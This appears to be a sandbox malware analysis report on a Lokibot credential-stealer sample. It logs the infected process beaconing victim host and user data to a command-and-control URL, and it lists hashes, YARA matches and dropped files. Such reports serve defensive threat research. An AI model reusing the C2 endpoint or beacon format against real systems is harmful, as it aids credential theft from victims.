Feb 25, 2025 15:38:59.986448050 CET	822	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 25 Feb 2025 14:38:59 GMT Connection: close Via: 1.0 middlebox Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/scc1/five/fre.php cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FrMsd42zGu271czRJnc4aQAkUX60Z76c%2F3bvkUUbd7qzMR7vLiaGfb%2BAP6zfMXPqn4cU1VsQWEnqNePlgZCj9XuroLBXFztbROJJL5ADt8KU5NCqv%2FvtHE8pzkQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787136d916f78f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1649&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.5	50037	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:39:01.145091057 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:39:01.151194096 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:39:01.904460907 CET	840	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:39:01 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cwdGmKStxNvNQDzVw1icNJK%2F4ntxojb2FD8BOE4bHkBPZiRDx1KzKJxcOcDb0XKpxj6rOG1YZfkMPDjyEI2sbBtM56VOFFnZXzH599WjwlGNtArzRxRbo%2FCERLo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91787142bd4bf799-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1576&rtt_var=788&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	50038	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:39:03.220135927 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:39:03.225172997 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:39:03.981158018 CET	845	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:39:03 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n86%2BaImh1xL2YICyCDlePZa%2FSLKU9UifPj4uDiyIPz1ZU3f86KfszdhBEUr64G2ppVNK3YUwg3RhCS5EHiDHIcL%2BGqWzc%2Bc8hJkpaIgBSIL3qHq7UxYOxGNuxbg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178714fbd54558a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2711&min_rtt=2711&rtt_var=1355&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	50039	104.21.80.1	80	3868	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2025 15:39:05.174199104 CET	239	OUT	POST /scc1/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: touxzw.ir Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FC79CF12 Content-Length: 153 Connection: close
Feb 25, 2025 15:39:05.179203033 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 33 00 34 00 37 00 36 00 38 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons347688ALFONS-PC0FDD42EE188E931437F4FBE2C
Feb 25, 2025 15:39:05.946638107 CET	836	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Feb 2025 14:39:05 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5uPvlrBFEtygqg8GtvS8aPJRZ7vUlPiH88Q39nTIZBQCKTVva8tI5I2jVLFljQ95O1jj12yuVNEc3CP0QXgiCpMHZiqkuxWlihU3i54tPjR66kRbR6D7Mn2C2ck%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9178715bebb842dc-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=392&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	09:37:00
Start date:	25/02/2025
Path:	C:\Users\user\Desktop\PRI_VTK250419A.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PRI_VTK250419A.exe"
Imagebase:	0xbd0000
File size:	967'168 bytes
MD5 hash:	D45AB46D87BB599CCC62569C10D2D323
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.2060454588.0000000001120000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:37:01
Start date:	25/02/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\PRI_VTK250419A.exe"
Imagebase:	0x190000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3294418603.0000000003021000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3294031645.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PRI_VTK250419A.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\autCDC5.tmp

C:\Users\user\AppData\Local\Temp\autCDF5.tmp

C:\Users\user\AppData\Local\Temp\spado

C:\Users\user\AppData\Local\Temp\untraumatic

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Windows Analysis Report
PRI_VTK250419A.exe